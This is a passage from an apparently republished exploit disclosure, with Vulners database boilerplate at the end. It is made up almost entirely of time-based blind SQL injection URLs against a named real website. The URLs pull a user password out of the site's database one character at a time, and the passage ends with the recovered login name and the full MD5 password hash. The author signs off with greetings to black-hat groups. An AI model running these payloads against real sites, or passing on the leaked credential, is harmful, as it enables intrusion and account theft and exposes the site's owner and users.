http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,16,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
17-ci simvol: 0
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,17,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
18--ci simvol: 0
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,18,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
19-cu simvol: 9
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,19,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
20-ci simvol: f
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,20,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
21-ci simvol: e
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,21,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
22-c simvol: 3
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,22,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
23-cu simvol: 6
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,23,1)='6',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
24-cu simvol: e
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,24,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
25-ci simvol: f
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,25,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
26-ci simvol: 0
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,26,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
27-ci simvol: 0
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,27,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
28-ci simvol: 7
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,28,1)='7',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
29-cu simvol: 2
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,29,1)='2',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
30-cu simvol: 8
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,30,1)='8',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
31-ci simvol: 3
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,31,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
32-ci simvol: f
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,32,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
Login: mogin
MD5 HASH: e79d2f315e99cac9009fe36ef007283f
Qirilmadi hash:( Blya beddiydie basdan ayaga:*(
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,33)='e79d2f315e99cac9009fe36ef007283f',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
===========================================================
Enjoy)
SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
===========================================================
/AkaStep
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Sep 2012 00:00Current
0.4Low risk
Vulners AI Score0.4